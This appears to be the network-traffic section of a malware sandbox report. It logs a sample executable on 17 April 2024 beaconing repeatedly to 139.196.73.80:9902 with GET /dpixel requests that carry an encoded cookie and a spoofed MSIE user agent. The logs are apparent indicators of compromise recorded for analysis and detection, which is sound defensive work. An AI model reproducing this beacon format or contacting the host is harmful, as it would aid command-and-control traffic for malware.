Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:07.326848984 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:07.663151979 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:08.141271114 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:08.493603945 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49742	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:08.924618006 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:09.270562887 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49743	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:09.695252895 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:10.012763977 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49744	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:10.465434074 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:10.795494080 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49745	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:12.549341917 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:12.877871990 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49746	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:13.473414898 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:13.815772057 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:35.409679890 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:35.733340979 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:36.156630993 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:36.470002890 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:36.893651009 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:37.208169937 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:37.659017086 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:38.009232998 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:38.430969954 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:38.749429941 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:39.178682089 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:39.502971888 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:39.965425968 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:40.316447020 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:40.738590002 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:41.059743881 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:41.506294966 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:41.829854012 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:42.288953066 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:42.647068024 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:43.065495014 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:43.378684044 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:43.825597048 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:44.163419962 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:44.610974073 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:44.945724964 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:45.362401962 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:45.678443909 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:46.147056103 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:46.489902973 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:47.145778894 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:47.461210012 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:49.699009895 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:50.094757080 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:50.446268082 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:50.888155937 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:51.227761984 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:51.673891068 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:52.031653881 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:52.535451889 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:52.877414942 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:53.340483904 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:53.688910007 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:54.126465082 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:54.459425926 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:54 GMT Content-Type: application/octet-stream Content-Length: 0

